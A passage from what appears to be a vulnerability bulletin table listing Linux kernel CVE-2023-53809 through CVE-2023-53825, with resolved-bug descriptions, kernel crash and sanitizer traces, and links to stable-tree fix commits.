Trace: <TASK> dump_stack_lvl+0x100/0x178 __lock_acquire.cold+0x119/0x3b9 ? lockdep_hardirqs_on_prepare+0x410/0x410 lock_acquire+0x1e0/0x610 ? l2tp_tunnel_register+0x2b7/0x11c0 ? lock_downgrade+0x710/0x710 ? __fget_files+0x283/0x3e0 lock_sock_nested+0x3a/0xf0 ? l2tp_tunnel_register+0x2b7/0x11c0 l2tp_tunnel_register+0x2b7/0x11c0 ? sprintf+0xc4/0x100 ? l2tp_tunnel_del_work+0x6b0/0x6b0 ? debug_object_deactivate+0x320/0x320 ? lockdep_init_map_type+0x16d/0x7a0 ? lockdep_init_map_type+0x16d/0x7a0 ? l2tp_tunnel_create+0x2bf/0x4b0 ? l2tp_tunnel_create+0x3c6/0x4b0 pppol2tp_connect+0x14e1/0x1a30 ? pppol2tp_put_sk+0xd0/0xd0 ? aa_sk_perm+0x2b7/0xa80 ? aa_af_perm+0x260/0x260 ? bpf_lsm_socket_connect+0x9/0x10 ? pppol2tp_put_sk+0xd0/0xd0 __sys_connect_file+0x14f/0x190 __sys_connect+0x133/0x160 ? __sys_connect_file+0x190/0x190 ? lockdep_hardirqs_on+0x7d/0x100 ? ktime_get_coarse_real_ts64+0x1b7/0x200 ? ktime_get_coarse_real_ts64+0x147/0x200 ? __audit_syscall_entry+0x396/0x500 __x64_sys_connect+0x72/0xb0 do_syscall_64+0x38/0xb0 entry_SYSCALL_64_after_hwframe+0x63/0xcd This patch fixes the issue by getting/creating the tunnel before locking the pppol2tp socket. | 2025-12-09 | not yet calculated | CVE-2023-53809 | https://git.kernel.org/stable/c/4a413d360959962995e16a899cf2b9ef53e9fcb9 https://git.kernel.org/stable/c/f6df58aa15f7d469f69b1dd21b001ff483255244 https://git.kernel.org/stable/c/4bb736b40475528ac1aa8c98b368563618488a70 https://git.kernel.org/stable/c/5370647dd745bb3d8f37057006be207ddd8e9314 https://git.kernel.org/stable/c/9ca5e7ecab064f1f47da07f7c1ddf40e4bc0e5ac |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: blk-mq: release crypto keyslot before reporting I/O complete Once all I/O using a blk_crypto_key has completed, filesystems can call blk_crypto_evict_key(). However, the block layer currently doesn't call blk_crypto_put_keyslot() until the request is being freed, which happens after upper layers have been told (via bio_endio()) the I/O has completed. This causes a race condition where blk_crypto_evict_key() can see 'slot_refs != 0' without there being an actual bug. This makes __blk_crypto_evict_key() hit the 'WARN_ON_ONCE(atomic_read(&slot->slot_refs) != 0)' and return without doing anything, eventually causing a use-after-free in blk_crypto_reprogram_all_keys(). (This is a very rare bug and has only been seen when per-file keys are being used with fscrypt.) There are two options to fix this: either release the keyslot before bio_endio() is called on the request's last bio, or make __blk_crypto_evict_key() ignore slot_refs. Let's go with the first solution, since it preserves the ability to report bugs (via WARN_ON_ONCE) where a key is evicted while still in-use. | 2025-12-09 | not yet calculated | CVE-2023-53810 | https://git.kernel.org/stable/c/874bdf43b4a7dc5463c31508f62b3e42eb237b08 https://git.kernel.org/stable/c/d206f79d9cd658665b37ce8134c6ec849ac7af0c https://git.kernel.org/stable/c/7d206ec7a04e8545828191b6ea8b49d3ea61391f https://git.kernel.org/stable/c/b278570e2c59d538216f8b656e97680188a8fba4 https://git.kernel.org/stable/c/92d5d233b9ff531cf9cc36ab4251779e07adb633 https://git.kernel.org/stable/c/9cd1e566676bbcb8a126acd921e4e194e6339603 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/irdma: Cap MSIX used to online CPUs + 1 The irdma driver can use a maximum number of msix vectors equal to num_online_cpus() + 1 and the kernel warning stack below is shown if that number is exceeded. The kernel throws a warning as the driver tries to update the affinity hint with a CPU mask greater than the max CPU IDs. Fix this by capping the MSIX vectors to num_online_cpus() + 1. WARNING: CPU: 7 PID: 23655 at include/linux/cpumask.h:106 irdma_cfg_ceq_vector+0x34c/0x3f0 [irdma] RIP: 0010:irdma_cfg_ceq_vector+0x34c/0x3f0 [irdma] Call Trace: irdma_rt_init_hw+0xa62/0x1290 [irdma] ? irdma_alloc_local_mac_entry+0x1a0/0x1a0 [irdma] ? __is_kernel_percpu_address+0x63/0x310 ? rcu_read_lock_held_common+0xe/0xb0 ? irdma_lan_unregister_qset+0x280/0x280 [irdma] ? irdma_request_reset+0x80/0x80 [irdma] ? ice_get_qos_params+0x84/0x390 [ice] irdma_probe+0xa40/0xfc0 [irdma] ? rcu_read_lock_bh_held+0xd0/0xd0 ? irdma_remove+0x140/0x140 [irdma] ? rcu_read_lock_sched_held+0x62/0xe0 ? down_write+0x187/0x3d0 ? auxiliary_match_id+0xf0/0x1a0 ? irdma_remove+0x140/0x140 [irdma] auxiliary_bus_probe+0xa6/0x100 __driver_probe_device+0x4a4/0xd50 ? __device_attach_driver+0x2c0/0x2c0 driver_probe_device+0x4a/0x110 __driver_attach+0x1aa/0x350 bus_for_each_dev+0x11d/0x1b0 ? subsys_dev_iter_init+0xe0/0xe0 bus_add_driver+0x3b1/0x610 driver_register+0x18e/0x410 ? 0xffffffffc0b88000 irdma_init_module+0x50/0xaa [irdma] do_one_initcall+0x103/0x5f0 ? perf_trace_initcall_level+0x420/0x420 ? do_init_module+0x4e/0x700 ? __kasan_kmalloc+0x7d/0xa0 ? kmem_cache_alloc_trace+0x188/0x2b0 ? kasan_unpoison+0x21/0x50 do_init_module+0x1d1/0x700 load_module+0x3867/0x5260 ? layout_and_allocate+0x3990/0x3990 ? rcu_read_lock_held_common+0xe/0xb0 ? rcu_read_lock_sched_held+0x62/0xe0 ? rcu_read_lock_bh_held+0xd0/0xd0 ? __vmalloc_node_range+0x46b/0x890 ? lock_release+0x5c8/0xba0 ? alloc_vm_area+0x120/0x120 ? selinux_kernel_module_from_file+0x2a5/0x300 ? __inode_security_revalidate+0xf0/0xf0 ? __do_sys_init_module+0x1db/0x260 __do_sys_init_module+0x1db/0x260 ? load_module+0x5260/0x5260 ? do_syscall_64+0x22/0x450 do_syscall_64+0xa5/0x450 entry_SYSCALL_64_after_hwframe+0x66/0xdb | 2025-12-09 | not yet calculated | CVE-2023-53811 | https://git.kernel.org/stable/c/87674a359ad173a3b8cd484e92e4f1901666da4c https://git.kernel.org/stable/c/b3bd44bf20cb3a6a47aa4373e1817147efb4be04 https://git.kernel.org/stable/c/209e4aa9a7b636d8aaa1297e1d089ee2ed91d73f https://git.kernel.org/stable/c/9cd9842c46996ef62173c36619c746f57416bcb0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: mediatek: vcodec: fix decoder disable pm crash Can't call pm_runtime_disable when the architecture supports sub devices and 'dev->pm.dev' is NULL, or we will get the crash log below. [ 10.771551] pc : _raw_spin_lock_irq+0x4c/0xa0 [ 10.771556] lr : __pm_runtime_disable+0x30/0x130 [ 10.771558] sp : ffffffc01e4cb800 [ 10.771559] x29: ffffffc01e4cb800 x28: ffffffdf082108a8 [ 10.771563] x27: ffffffc01e4cbd70 x26: ffffff8605df55f0 [ 10.771567] x25: 0000000000000002 x24: 0000000000000002 [ 10.771570] x23: ffffff85c0dc9c00 x22: 0000000000000001 [ 10.771573] x21: 0000000000000001 x20: 0000000000000000 [ 10.771577] x19: 00000000000000f4 x18: ffffffdf2e9fbe18 [ 10.771580] x17: 0000000000000000 x16: ffffffdf2df13c74 [ 10.771583] x15: 00000000000002ea x14: 0000000000000058 [ 10.771587] x13: ffffffdf2de1b62c x12: ffffffdf2e9e30e4 [ 10.771590] x11: 0000000000000000 x10: 0000000000000001 [ 10.771593] x9 : 0000000000000000 x8 : 00000000000000f4 [ 10.771596] x7 : 6bff6264632c6264 x6 : 0000000000008000 [ 10.771600] x5 : 0080000000000000 x4 : 0000000000000001 [ 10.771603] x3 : 0000000000000008 x2 : 0000000000000001 [ 10.771608] x1 : 0000000000000000 x0 : 00000000000000f4 [ 10.771613] Call trace: [ 10.771617] _raw_spin_lock_irq+0x4c/0xa0 [ 10.771620] __pm_runtime_disable+0x30/0x130 [ 10.771657] mtk_vcodec_probe+0x69c/0x728 [mtk_vcodec_dec 800cc929d6631f79f9b273254c8db94d0d3500dc] [ 10.771662] platform_drv_probe+0x9c/0xbc [ 10.771665] really_probe+0x13c/0x3a0 [ 10.771668] driver_probe_device+0x84/0xc0 [ 10.771671] device_driver_attach+0x54/0x78 | 2025-12-09 | not yet calculated | CVE-2023-53812 | https://git.kernel.org/stable/c/c692a44bc5146eb487f40798a1ea8dd57fd2607d https://git.kernel.org/stable/c/03e9773388a27242e6139f3d5b5fd00112adb5c3 https://git.kernel.org/stable/c/34fe290090ecfcf405cad9d0e0ddc8b8246ffaa2 https://git.kernel.org/stable/c/9d2f13fb47dcab6d094f34ecfd6a879a409722b3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix rbtree traversal bug in ext4_mb_use_preallocated During allocations, while looking for preallocations (PA) in the per inode rbtree, we can't do a direct traversal of the tree because ext4_mb_discard_group_preallocation() can in parallel mark the pa deleted and that can cause direct traversal to skip some entries. This was leading to a BUG_ON() being hit [1] when we missed a PA that could satisfy our request and ultimately tried to create a new PA that would overlap with the missed one. To make sure we handle that case while still keeping the performance of the rbtree, we make use of the fact that the only pa that could possibly overlap the original goal start is the one that satisfies the below conditions: 1. It must have its logical start immediately to the left of (i.e. less than) the original logical start. 2. It must not be deleted. To find this pa we use the following traversal method: 1. Descend into the rbtree normally to find the immediate neighboring PA. Here we keep descending irrespective of whether the PA is deleted or whether it overlaps with our request etc. The goal is to find an immediately adjacent PA. 2. If the found PA is on the right of the original goal, use rb_prev() to find the left adjacent PA. 3. Check if this PA is deleted and keep moving left with rb_prev() until a non-deleted PA is found. 4. This is the PA we are looking for. Now we can check if it can satisfy the original request and proceed accordingly. This approach also takes care of having deleted PAs in the tree. (While we are at it, also fix a possible overflow bug in calculating the end of a PA.) [1] https://lore.kernel.org/linux-ext4/CA+G9fYv2FRpLqBZf34ZinR8bU2_ZRAUOjKAD3+tKRFaEQHtt8Q@mail.gmail.com/ | 2025-12-09 | not yet calculated | CVE-2023-53813 | https://git.kernel.org/stable/c/339fee69a1daa71d6f97e47a867e2c32419a2406 https://git.kernel.org/stable/c/9d3de7ee192a6a253f475197fe4d2e2af10a731f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI: Fix dropping valid root bus resources with .end = zero On r8a7791/koelsch: kmemleak: 1 new suspected memory leaks (see /sys/kernel/debug/kmemleak) # cat /sys/kernel/debug/kmemleak unreferenced object 0xc3a34e00 (size 64): comm "swapper/0", pid 1, jiffies 4294937460 (age 199.080s) hex dump (first 32 bytes): b4 5d 81 f0 b4 5d 81 f0 c0 b0 a2 c3 00 00 00 00 .]...].......... 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ backtrace: [<fe3aa979>] __kmalloc+0xf0/0x140 [<34bd6bc0>] resource_list_create_entry+0x18/0x38 [<767046bc>] pci_add_resource_offset+0x20/0x68 [<b3f3edf2>] devm_of_pci_get_host_bridge_resources.constprop.0+0xb0/0x390 When coalescing two resources for a contiguous aperture, the second resource is enlarged to cover the full contiguous range, while the first resource is marked invalid. This invalidation is done by clearing the flags, start, and end members. When adding the initial resources to the bus later, invalid resources are skipped. Unfortunately, the check for an invalid resource considers only the end member, causing false positives. E.g. on r8a7791/koelsch, root bus resource 0 ("bus 00") is skipped, and no longer registered with pci_bus_insert_busn_res() (causing the memory leak), nor printed: pci-rcar-gen2 ee090000.pci: host bridge /soc/pci@ee090000 ranges: pci-rcar-gen2 ee090000.pci: MEM 0x00ee080000..0x00ee08ffff -> 0x00ee080000 pci-rcar-gen2 ee090000.pci: PCI: revision 11 pci-rcar-gen2 ee090000.pci: PCI host bridge to bus 0000:00 -pci_bus 0000:00: root bus resource [bus 00] pci_bus 0000:00: root bus resource [mem 0xee080000-0xee08ffff] Fix this by only skipping resources where all of the flags, start, and end members are zero. | 2025-12-09 | not yet calculated | CVE-2023-53814 | https://git.kernel.org/stable/c/e4af080f3ef6a65b0d702988c2471a47c9ae2cc0 https://git.kernel.org/stable/c/fe6a1fbe83f5b23d7db93596b793561230f06b40 https://git.kernel.org/stable/c/7e6f2714d93cdf977b6124a80af2cf0e14e2d407 https://git.kernel.org/stable/c/9d8ba74a181b1c81def21168795ed96cbe6f05ed |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: posix-timers: Prevent RT livelock in itimer_delete() itimer_delete() has a retry loop when the timer is concurrently expired. On non-RT kernels this just spin-waits until the timer callback has completed, except for posix CPU timers which have HAVE_POSIX_CPU_TIMERS_TASK_WORK enabled. In that case and on RT kernels the existing task could live lock when preempting the task which does the timer delivery. Replace spin_unlock() with an invocation of timer_wait_running() to handle it the same way as the other retry loops in the posix timer code. | 2025-12-09 | not yet calculated | CVE-2023-53815 | https://git.kernel.org/stable/c/f1be1ed32daa053484222f7f9beb2b16c624dffd https://git.kernel.org/stable/c/0670c4c567b27bd8f999a943028f4fe60d1a1106 https://git.kernel.org/stable/c/e7aff15ba29ba4b3052786b1636fa5c4aa39e179 https://git.kernel.org/stable/c/f9bd298e3e4d3fd6e19f017789a42d0f332cd555 https://git.kernel.org/stable/c/c1968bb8a28625cc95d2ad3ca872ab98c9c36d59 https://git.kernel.org/stable/c/9d9e522010eb5685d8b53e8a24320653d9d4cbbf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdkfd: fix potential kgd_mem UAFs kgd_mem pointers returned by kfd_process_device_translate_handle are only guaranteed to be valid while p->mutex is held. As soon as the mutex is unlocked, another thread can free the BO. | 2025-12-09 | not yet calculated | CVE-2023-53816 | https://git.kernel.org/stable/c/5045360f3bb62ccd4f87202e33489f71f8bbc3fc https://git.kernel.org/stable/c/5ca14fb5552ac13a2402d306c0bd2379a71610ff https://git.kernel.org/stable/c/9da050b0d9e04439d225a2ec3044af70cdfb3933 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: lib/mpi - avoid null pointer deref in mpi_cmp_ui() During NVMeTCP Authentication a controller can trigger a kernel oops by specifying the 8192 bit Diffie-Hellman group and passing a correctly sized, but zeroed Diffie-Hellman value. mpi_cmp_ui() was detecting this if the second parameter was 0, but 1 is passed from dh_is_pubkey_valid(). This causes the null pointer u->d to be dereferenced towards the end of mpi_cmp_ui(). | 2025-12-09 | not yet calculated | CVE-2023-53817 | https://git.kernel.org/stable/c/fde791e8a96a64ea7b0ad2440e43586447a209c6 https://git.kernel.org/stable/c/ae63e84ffda74267bf7277c38415ba38389229a0 https://git.kernel.org/stable/c/61f5453e9706e99713825594e0c8f9031485fb5f https://git.kernel.org/stable/c/0fc7147c694394f8a8cbc19570c6bc918cac0906 https://git.kernel.org/stable/c/67589d247909043e94d2dd5fb590958e0f99d58d https://git.kernel.org/stable/c/d3ad023a39f1127dcfd331c562673355dc078650 https://git.kernel.org/stable/c/12ac013ad7ff0df066451e825801d805095b3776 https://git.kernel.org/stable/c/9e47a758b70167c9301d2b44d2569f86c7796f2d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ARM: zynq: Fix refcount leak in zynq_early_slcr_init of_find_compatible_node() returns a node pointer with refcount incremented; we should use of_node_put() on the error path. Add the missing of_node_put() to avoid a refcount leak. | 2025-12-09 | not yet calculated | CVE-2023-53818 | https://git.kernel.org/stable/c/f00bc6727adf840eb208700ea27cda4f3742629d https://git.kernel.org/stable/c/351b7e93d02b50b2faae2d4bda28e16a8389cbb7 https://git.kernel.org/stable/c/ede0334bf4df360f4f9446075cffbbb3bc54d0b6 https://git.kernel.org/stable/c/227f8c1c5c4b3d131b66e57e58d38054f441b915 https://git.kernel.org/stable/c/1cc12d10d13ae5ad8d3f7432a4c0156d221fc99b https://git.kernel.org/stable/c/e43a06c73be4b93d308f0df809ee0023b7c37b54 https://git.kernel.org/stable/c/4c22ee805202087c2553c9175968e9e922d75bc1 https://git.kernel.org/stable/c/9eedb910a3be0005b88c696a8552c0d4c9937cd4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: amdgpu: validate offset_in_bo of drm_amdgpu_gem_va This is motivated by OOB access in amdgpu_vm_update_range when offset_in_bo+map_size overflows. v2: keep the validations in amdgpu_vm_bo_map v3: add the validations to amdgpu_vm_bo_map/amdgpu_vm_bo_replace_map rather than to amdgpu_gem_va_ioctl | 2025-12-09 | not yet calculated | CVE-2023-53819 | https://git.kernel.org/stable/c/82aace80cfaab778245bd2f9e31b67953725e4d0 https://git.kernel.org/stable/c/d83c337e654d58d3edd15a2ae76e87dc601c07d9 https://git.kernel.org/stable/c/968e27fd037ec4732068820a9b9836eccc0e0a12 https://git.kernel.org/stable/c/4300a47e4017c9febb60ffa7d39723eeaed00f2b https://git.kernel.org/stable/c/b10db1d2137415e5e7f9706d96cfe77539c499d4 https://git.kernel.org/stable/c/f015aadc0d973047f49526a127e900c488d4e425 https://git.kernel.org/stable/c/bc6dbf34dc4fb639522f3e8e66ef05997c0441ee https://git.kernel.org/stable/c/9f0bcf49e9895cb005d78b33a5eebfa11711b425 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: loop: loop_set_status_from_info() check before assignment In loop_set_status_from_info(), lo->lo_offset and lo->lo_sizelimit should be checked before reassignment, because if an overflow error occurs, the original correct value will be changed to the wrong value, and it will not be changed back. Moreover, the original patch did not solve the problem: the value was set and the ioctl returned an error, but the subsequent I/O used the value in the loop driver, which still caused an alarm: loop_handle_cmd do_req_filebacked loff_t pos = ((loff_t) blk_rq_pos(rq) << 9) + lo->lo_offset; lo_rw_aio cmd->iocb.ki_pos = pos | 2025-12-09 | not yet calculated | CVE-2023-53820 | https://git.kernel.org/stable/c/832580af82ace363205039a8e7c4ef04552ccc1a https://git.kernel.org/stable/c/861021710bba9dfa0749a3c209a6c1773208b1f1 https://git.kernel.org/stable/c/c79a924ed6afac1708dfd370ba66bcf6a852ced6 https://git.kernel.org/stable/c/3e7d0968203d668af6036b9f9199c7b62c8a3581 https://git.kernel.org/stable/c/4be26d553a3f1d4f54f25353d1496c562002126d https://git.kernel.org/stable/c/258809bf22bf71d53247856f374f2b1d055f2fd4 https://git.kernel.org/stable/c/9f6ad5d533d1c71e51bdd06a5712c4fbc8768dfa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ip6_vti: fix slab-use-after-free in decode_session6 When ipv6_vti device is set to the qdisc of the sfb type, the cb field of the sent skb may be modified during enqueuing. Then, slab-use-after-free may occur when ipv6_vti device sends IPv6 packets. The stack information is as follows: BUG: KASAN: slab-use-after-free in decode_session6+0x103f/0x1890 Read of size 1 at addr ffff88802e08edc2 by task swapper/0/0 CPU: 0 PID: 0 Comm: swapper/0 Not tainted 6.4.0-next-20230707-00001-g84e2cad7f979 #410 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-1.fc33 04/01/2014 Call Trace: <IRQ> dump_stack_lvl+0xd9/0x150 print_address_description.constprop.0+0x2c/0x3c0 kasan_report+0x11d/0x130 decode_session6+0x103f/0x1890 __xfrm_decode_session+0x54/0xb0 vti6_tnl_xmit+0x3e6/0x1ee0 dev_hard_start_xmit+0x187/0x700 sch_direct_xmit+0x1a3/0xc30 __qdisc_run+0x510/0x17a0 __dev_queue_xmit+0x2215/0x3b10 neigh_connected_output+0x3c2/0x550 ip6_finish_output2+0x55a/0x1550 ip6_finish_output+0x6b9/0x1270 ip6_output+0x1f1/0x540 ndisc_send_skb+0xa63/0x1890 ndisc_send_rs+0x132/0x6f0 addrconf_rs_timer+0x3f1/0x870 call_timer_fn+0x1a0/0x580 expire_timers+0x29b/0x4b0 run_timer_softirq+0x326/0x910 __do_softirq+0x1d4/0x905 irq_exit_rcu+0xb7/0x120 sysvec_apic_timer_interrupt+0x97/0xc0 </IRQ> Allocated by task 9176: kasan_save_stack+0x22/0x40 kasan_set_track+0x25/0x30 __kasan_slab_alloc+0x7f/0x90 kmem_cache_alloc_node+0x1cd/0x410 kmalloc_reserve+0x165/0x270 __alloc_skb+0x129/0x330 netlink_sendmsg+0x9b1/0xe30 sock_sendmsg+0xde/0x190 ____sys_sendmsg+0x739/0x920 ___sys_sendmsg+0x110/0x1b0 __sys_sendmsg+0xf7/0x1c0 do_syscall_64+0x39/0xb0 entry_SYSCALL_64_after_hwframe+0x63/0xcd Freed by task 9176: kasan_save_stack+0x22/0x40 kasan_set_track+0x25/0x30 kasan_save_free_info+0x2b/0x40 ____kasan_slab_free+0x160/0x1c0 slab_free_freelist_hook+0x11b/0x220 kmem_cache_free+0xf0/0x490 skb_free_head+0x17f/0x1b0 skb_release_data+0x59c/0x850 consume_skb+0xd2/0x170 netlink_unicast+0x54f/0x7f0 netlink_sendmsg+0x926/0xe30 sock_sendmsg+0xde/0x190 ____sys_sendmsg+0x739/0x920 ___sys_sendmsg+0x110/0x1b0 __sys_sendmsg+0xf7/0x1c0 do_syscall_64+0x39/0xb0 entry_SYSCALL_64_after_hwframe+0x63/0xcd The buggy address belongs to the object at ffff88802e08ed00 which belongs to the cache skbuff_small_head of size 640 The buggy address is located 194 bytes inside of freed 640-byte region [ffff88802e08ed00, ffff88802e08ef80) As commit f855691975bb ("xfrm6: Fix the nexthdr offset in _decode_session6.") showed, xfrm_decode_session was originally intended only for the receive path. IP6CB(skb)->nhoff is not set during transmission. Therefore, set the cb field in the skb to 0 before sending packets. | 2025-12-09 | not yet calculated | CVE-2023-53821 | https://git.kernel.org/stable/c/0f0ab8d52ee0062b28367dea23c29e254a26d7db https://git.kernel.org/stable/c/fa6c6c04f6c9b21b315023f487e5a07ae7fcf647 https://git.kernel.org/stable/c/eb47e612e59c358c3968a92f90dd36c78c9a2106 https://git.kernel.org/stable/c/ec23b25e5687dbd644c0f57bcb6af22dd5a6dd36 https://git.kernel.org/stable/c/a1639a82ce14af76b6419778d343ccbff86ee626 https://git.kernel.org/stable/c/55ad2309205cc00c585344374c7472420e1b2c12 https://git.kernel.org/stable/c/c070688bfbe7759e61e697e421b2a331b0dd74bc https://git.kernel.org/stable/c/9fd41f1ba638938c9a1195d09bc6fa3be2712f25 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath11k: Ignore frags from uninitialized peer in dp. When max virtual ap interfaces are configured in all the bands with ACS and hostapd restart is done every 60s, a crash is observed at random times. In this certain scenario, a fragmented packet is received for self peer, for which rx_tid and rx_frags are not initialized in datapath. While handling this fragment, crash is observed as the rx_frag list is uninitialised and when we walk in ath11k_dp_rx_h_sort_frags, skb null leads to exception. To address this, before processing received fragments we check dp_setup_done flag is set to ensure that peer has completed its dp peer setup for fragment queue, else ignore processing the fragments. Call trace: ath11k_dp_process_rx_err+0x550/0x1084 [ath11k] ath11k_dp_service_srng+0x70/0x370 [ath11k] 0xffffffc009693a04 __napi_poll+0x30/0xa4 net_rx_action+0x118/0x270 __do_softirq+0x10c/0x244 irq_exit+0x64/0xb4 __handle_domain_irq+0x88/0xac gic_handle_irq+0x74/0xbc el1_irq+0xf0/0x1c0 arch_cpu_idle+0x10/0x18 do_idle+0x104/0x248 cpu_startup_entry+0x20/0x64 rest_init+0xd0/0xdc arch_call_rest_init+0xc/0x14 start_kernel+0x480/0x4b8 Code: f9400281 f94066a2 91405021 b94a0023 (f9406401) Tested-on: IPQ8074 hw2.0 AHB WLAN.HK.2.7.0.1-01744-QCAHKSWPL_SILICONZ-1 | 2025-12-09 | not yet calculated | CVE-2023-53822 | https://git.kernel.org/stable/c/e78526a06b53718bfc1dfff37864c7760e41f8ec https://git.kernel.org/stable/c/41efc47f5bc53e63461579e206adc17c4452ab6e https://git.kernel.org/stable/c/a06bfb3c9f69f303692cdae87bc0899d2ae8b2a6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: block/rq_qos: protect rq_qos apis with a new lock commit 50e34d78815e ("block: disable the elevator int del_gendisk") moved rq_qos_exit() from disk_release() to del_gendisk(); this introduces some problems: 1) If rq_qos_add() is triggered by enabling iocost/iolatency through cgroupfs, then it can run concurrently with del_gendisk(), and it's not safe to write 'q->rq_qos' concurrently. 2) Activating a cgroup policy that relies on rq_qos will call rq_qos_add() and blkcg_activate_policy(), and if rq_qos_exit() is called in the middle, a null-ptr-dereference will be triggered in blkcg_activate_policy(). 3) blkg_conf_open_bdev() can call blkdev_get_no_open() first to find the disk; then, if rq_qos_exit() from del_gendisk() is done before rq_qos_add(), memory will be leaked. This patch adds a new disk level mutex 'rq_qos_mutex': 1) The lock will protect rq_qos_exit() directly. 2) For wbt, which doesn't rely on blk-cgroup, rq_qos_add() can only be called from disk initialization for now because wbt can't be destructed until rq_qos_exit(), so it's safe not to protect wbt for now. However, in case dynamic destruction of rq_qos is supported in the future, this patch also protects rq_qos_add() from wbt_init() directly; this is enough because blk-sysfs already synchronizes writers with disk removal. 3) For iocost and iolatency, in order to synchronize disk removal and cgroup configuration, the lock is held after blkdev_get_no_open() from blkg_conf_open_bdev(), and is released in blkg_conf_exit(). In order to fix the above memory leak, disk_live() is checked after holding the new lock. | 2025-12-09 | not yet calculated | CVE-2023-53823 | https://git.kernel.org/stable/c/16398b4638b5cd8c1dc95fc940a1591a801d53ce https://git.kernel.org/stable/c/a13bd91be22318768d55470cbc0b0f4488ef9edf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netlink: annotate lockless accesses to nlk->max_recvmsg_len syzbot reported a data-race in netlink_recvmsg() [1] Indeed, netlink_recvmsg() can be run concurrently, and netlink_dump() also needs protection. [1] BUG: KCSAN: data-race in netlink_recvmsg / netlink_recvmsg read to 0xffff888141840b38 of 8 bytes by task 23057 on cpu 0: netlink_recvmsg+0xea/0x730 net/netlink/af_netlink.c:1988 sock_recvmsg_nosec net/socket.c:1017 [inline] sock_recvmsg net/socket.c:1038 [inline] __sys_recvfrom+0x1ee/0x2e0 net/socket.c:2194 __do_sys_recvfrom net/socket.c:2212 [inline] __se_sys_recvfrom net/socket.c:2208 [inline] __x64_sys_recvfrom+0x78/0x90 net/socket.c:2208 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd write to 0xffff888141840b38 of 8 bytes by task 23037 on cpu 1: netlink_recvmsg+0x114/0x730 net/netlink/af_netlink.c:1989 sock_recvmsg_nosec net/socket.c:1017 [inline] sock_recvmsg net/socket.c:1038 [inline] ____sys_recvmsg+0x156/0x310 net/socket.c:2720 ___sys_recvmsg net/socket.c:2762 [inline] do_recvmmsg+0x2e5/0x710 net/socket.c:2856 __sys_recvmmsg net/socket.c:2935 [inline] __do_sys_recvmmsg net/socket.c:2958 [inline] __se_sys_recvmmsg net/socket.c:2951 [inline] __x64_sys_recvmmsg+0xe2/0x160 net/socket.c:2951 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd value changed: 0x0000000000000000 -> 0x0000000000001000 Reported by Kernel Concurrency Sanitizer on: CPU: 1 PID: 23037 Comm: syz-executor.2 Not tainted 6.3.0-rc4-syzkaller-00195-g5a57b48fdfcb #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/02/2023 | 2025-12-09 | not yet calculated | CVE-2023-53824 | https://git.kernel.org/stable/c/05c9e3fc93b02d18c3ab258d43350a6d44b40bbd https://git.kernel.org/stable/c/7cff4103be7c402ecc3e7bf8f95a64089e3c91b8 https://git.kernel.org/stable/c/e3bcf2a77060bea4d8d09cb09d92c7056f07df5a https://git.kernel.org/stable/c/fc4ba13013ddaea8b11b88fd52b35449e2d9cf85 https://git.kernel.org/stable/c/a1865f2e7d10dde00d35a2122b38d2e469ae67ed |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: kcm: Fix error handling for SOCK_DGRAM in kcm_sendmsg(). syzkaller found a memory leak in kcm_sendmsg(), and commit c821a88bd720 ("kcm: Fix memory leak in error path of kcm_sendmsg()") suppressed it by updating kcm_tx_msg(head)->last_skb if partial data is copied so that the following sendmsg() will resume from the skb. However, we cannot know how many bytes were copied when we get the error. Thus, we could mess up the MSG_MORE queue. When kcm_sendmsg() fails for SOCK_DGRAM, we should purge the queue as we do so for UDP by udp_flush_pending_frames(). Even without this change, when the error occurred, the following sendmsg() resumed from a wrong skb and the queue was messed up. However, we have yet to get such a report, and only syzkaller stumbled on it. So, this can be changed safely. Note this does not change SOCK_SEQPACKET behaviour. | 2025-12-09 | not yet calculated | CVE-2023-53825 | https://git.kernel.org/stable/c/21b467735b0888a8daa048f83d3b9b50fdab71ce https://git.kernel.org/stable/c/d4b8f380b0a041ee6a84fdac14127d8fe1dcad7b https://git.kernel.org/stable/c/1ce8362b4ac6b8e65fd04a22ea37ec776ee1ec5b https://git.kernel.org/stable/c/2e18493c421428a936946c452461b8e979088f17 https://git.kernel.org/stable/c/55d2e7c1ab8eaa7b62575b8a4194132795d1f9fc https://git.kernel.org/stable/c/e5b28ce127a690f3acc49a6a342e6c9442c9edd6 https://git.kernel.org/stable/c/992b2ac783aad360b98ed9d4686e86176a20f6f1 https://git.kernel.org/stable/c/a22730b1b4bf437c6bbfdeff5feddf54be4aeada |
